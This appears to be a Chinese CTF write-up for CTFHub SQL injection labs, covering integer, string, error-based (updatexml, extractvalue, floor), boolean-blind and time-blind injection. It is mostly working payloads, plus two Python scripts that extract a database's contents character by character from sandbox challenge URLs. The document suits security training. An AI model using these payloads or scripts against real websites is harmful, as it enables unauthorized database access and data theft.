整型注入

整型注入判断:
(1)加单引号,报错
(2)加and 1=1,正常
(3)加and 1=2,报错
判断玮整型注入
使用联合查询即可
payload:
id=2 order by 2
判断显示位
id=2 and 1=2 union select 1,2
获得表名
id=2 and 1=2 union select 1,group_concat(table_name) from information_schema.tables
where table_schema=database()
获得列名
id=2 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=’flag’
获得内容
id=2 and 1=2 union select 1,flag from flag

字符型注入

字符串注入判断
(1)加单引号(或双引号),报错,加注释后正常
(2)加1’ and 1=1#正常
(3)加1’ and 1=2#报错
常用注释符为:
#
—+
联合查询注入
2’ order by 2 #
2’ and 1=2 union select 1,2 #
2’ and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
2’ and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=’flag’ #
2’ and 1=2 union select 1,flag from flag #

报错注入

首先介绍三种报错注入常用的语句: (1). 通过floor报错 and (select 1 from (select count(),concat(( payload),floor (rand(0)2))x from information_schema.tables group by x)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64个字符

(2). 通过updatexml报错 and updatexml(1, payload,1) 同样该语句对输出的字符长度也做了限制,其最长输出32位 并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效

(3). 通过ExtractValue报错 and extractvalue(1, payload) 输出字符有长度限制,最长32位。


select from news where id=1 or (updatexml(1,concat(0x7e,database(),0x7e),1))
image.png

select from news where id=1 or (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))
image.png

select from news where id=1 or (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’flag’),0x7e),1))
image.png
内容
由于updatexml限制输出字符长度,可能输出的字符串不全,通常需要分为左右部分输出
select from news where id=1 or (updatexml(1,concat(0x7e,(select flag from flag),0x7e),1))
image.png
左部分:ctfhub{c76caabdb3959de675165447

select * from news where id=1 or (updatexml(1,concat(0x7e,(select right(flag, 30) from flag),0x7e),1))
image.png
右部分:fhub{c76caabdb3959de675165447}
右部分与左部分去重后得到flag
ctfhub{c76caabdb3959de675165447}

布尔盲注

正常是仅返回query_success
image.png
错误时仅显示query_error,并无详细的报错信息可以参考,并且看出是get型请求,符合布尔盲注的前提条件
image.png

  1. #coding:utf-8
  2. import requests
  3. session=requests.session()
  4. url="http://challenge-cef754c463a1ef6d.sandbox.ctfhub.com:10800/?id=1 "
  5. flag=''
  6. for i in range(1,50):
  7.     print(i)
  8.     for j in range(38,128):#38 128
  9.         # print(j)
  10.         #跑库名 sqli
  11.         #str from position for length
  12.         # payolad="and case ord(mid(database() from {0} for 1)) when {1} then 1 else 0 end".format(i, j)
  13.         #跑表名 flag,news
  14.         # payolad = "and case ord(mid((select group_concat(table_name) from information_schema.tables \
  15.         # where table_schema=database()) from {0} for 1)) when {1} then 1 else 0 end".format(i, j)
  16.         #跑列名 flag
  17.         # payolad = "and case ord(mid((select group_concat(column_name) from information_schema.columns \
  18.         # where table_name='flag') from {0} for 1)) when {1} then 1 else 0 end".format(i, j)
  19.         #跑flag
  20.         payolad = 'and case ord(mid((select flag from flag) from {0} for 1)) when {1} then 1 else 0 end'.format(i, j)
  21.         # print(url + payolad)
  22.         r = session.get(url=url + payolad)
  23.         # 当爆出完整的名称后自动停止程序,127非打印字符,当爆破完整名称后下一个字符j会到127故退出程序
  24.         if j==127:
  25.             exit()
  26.         # 题中如果正确返回 query_success,故判断query_success在返回字符串中表示爆出对应字符,次循环跳出
  27.         if "query_success" in r.text:
  28.             flag+=chr(j)
  29.             print(flag)
  30.             break

时间盲注

分别输入,有响应时间差,可用时间盲注
1 and if(1=1,sleep(3),1)
1 and if(1=0,sleep(3),1)

  1. import requests
  2. import time
  3. url = "http://challenge-d691424bd2d907b4.sandbox.ctfhub.com:10800/?id=1 and "
  4. result = ''
  6. for i in range(1,50):
  7.     head = 32
  8.     tail = 127
  10.     while head < tail:
  11.         mid = (head + tail) // 2
  12.         #跑库名 sqli
  13.         # payload = '1=if(ord(mid(database() from {0} for 1))>{1},sleep(2),1) --+'.format(i, mid)
  14.         # 跑表名 flag
  15.         # payload = "1=if(ord(mid((select group_concat(table_name) from information_schema.tables \
  16.         # where table_schema=database()) from {0} for 1))>{1},sleep(2),1) --+".format(i, mid)
  17.         # 跑列名 flag
  18.         # payload = "1=if(ord(mid((select group_concat(column_name) from information_schema.columns \
  19.         # where table_name='flag') from {0} for 1))>{1},sleep(2),1) --+".format(i, mid)
  20.         # 跑flag
  21.         payload = "1=if(ord(mid((select flag from flag) from {0} for 1))>{1},sleep(2),1) --+".format(i, mid)
  22.         start_time = time.time()
  23.         r = requests.get(url + payload)
  24.         end_time = time.time()
  25.         if end_time - start_time > 1.5:
  26.             head = mid + 1
  27.         else:
  28.             tail = mid
  30.     if head != 32:
  31.         result += chr(head)
  32.     else:
  33.         break
  34.     print(result)